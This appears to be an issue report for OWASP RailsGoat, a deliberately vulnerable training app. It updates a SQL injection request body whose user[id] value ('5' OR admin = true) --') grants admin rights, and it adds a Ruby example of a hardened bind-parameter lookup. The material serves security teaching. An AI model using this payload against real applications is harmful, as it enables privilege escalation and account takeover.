Additionally, the described request string for the attack no longer works (at least in the docker version, per my testing).
Original:
utf8=✓&_method=put&authenticity_token=GXhLKKhfBXdFx5i6iqHEd5E32Kebn1+G35eA87RW1tU=&user[user_id]=5') OR admin = 't' --'")&user[password]=testtest1&user[password_confirmation]=testtest1
Working:
utf8=%E2%9C%93&_method=patch&authenticity_token=Md7OJziBYGQQT4L8%2BtyKICEHvfdcQpc%2F5yRmn9SJm7%2FXHpaVk0sptL%2FcZ2aglQtcO2G2ilxyS6hysuMW7Bnr1Q%3D%3D&user%5Bid%5D=5' OR admin = true) --%20&user%5Bpassword%5D=testtest1&user%5Bpassword_confirmation%5D=testtest1
The URL encoding and put -> patch changes are insignificant but just how they showed up by default in my browser, and I left them so it looks more similar when future users go to change it. The real change is the SQL injection string for the [user_id], which changes the parenthesis position, changes the admin property from t to true, and gets rid of extra characters at the end (but leaves a space since mysql needs it).
The proposed solutions do not work, as they rely on the no-longer existing user_id parameter, throwing the following error:

Refactor these to be in the following syntax. Also note, we no longer need to specify the column name since we're searching on primary key:
https://github.com/OWASP/railsgoat/wiki/R5-A1-SQL-Injection-Concatentation
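Added example (not RailsGoat's own code, and not part of the issue above): it decodes the "working" request body quoted in the issue and shows the defensive side of the lesson the wiki link describes, a strict primary-key check plus a bind-parameter query so the id string can never alter the statement. The query template, the `safe_pk`/`safe_lookup` names and the `TOKEN_PLACEHOLDER` value are assumptions for illustration.

```ruby
require 'cgi'

# Constructed copy of the "working" request body from this issue; the
# authenticity_token is replaced with a placeholder.
WORKING_REQUEST = "utf8=%E2%9C%93&_method=patch&authenticity_token=TOKEN_PLACEHOLDER" \
  "&user%5Bid%5D=5' OR admin = true) --%20" \
  "&user%5Bpassword%5D=testtest1&user%5Bpassword_confirmation%5D=testtest1"

# Decode an application/x-www-form-urlencoded body into a Hash of
# key => value, so user%5Bid%5D becomes the key "user[id]".
def parse_form(body)
  body.split('&').each_with_object({}) do |pair, h|
    key, val = pair.split('=', 2)
    h[CGI.unescape(key)] = CGI.unescape(val.to_s)
  end
end

# Strict primary-key check: the lookup is on an integer primary key, so
# anything that is not a plain run of digits is rejected before it can
# reach SQL. Returns the Integer, or nil when the value is not one.
def safe_pk(value)
  s = value.to_s.strip
  s.match?(/\A\d+\z/) ? s.to_i : nil
end

# Hardened lookup (hypothetical template): the SQL text is fixed and the id
# travels as a bind value, the same shape as ActiveRecord's where("id = ?", id),
# so a quote or parenthesis in the request can only ever be data.
def safe_lookup(params)
  id = safe_pk(params['user[id]'])
  return nil if id.nil?
  ['SELECT * FROM users WHERE id = ?', [id]]
end

if __FILE__ == $PROGRAM_NAME
  params = parse_form(WORKING_REQUEST)
  p params['user[id]']              # the raw, decoded id parameter
  p safe_lookup(params)             # nil: rejected by the integer check
  p safe_lookup('user[id]' => '5')  # fixed SQL plus the bound integer
end
```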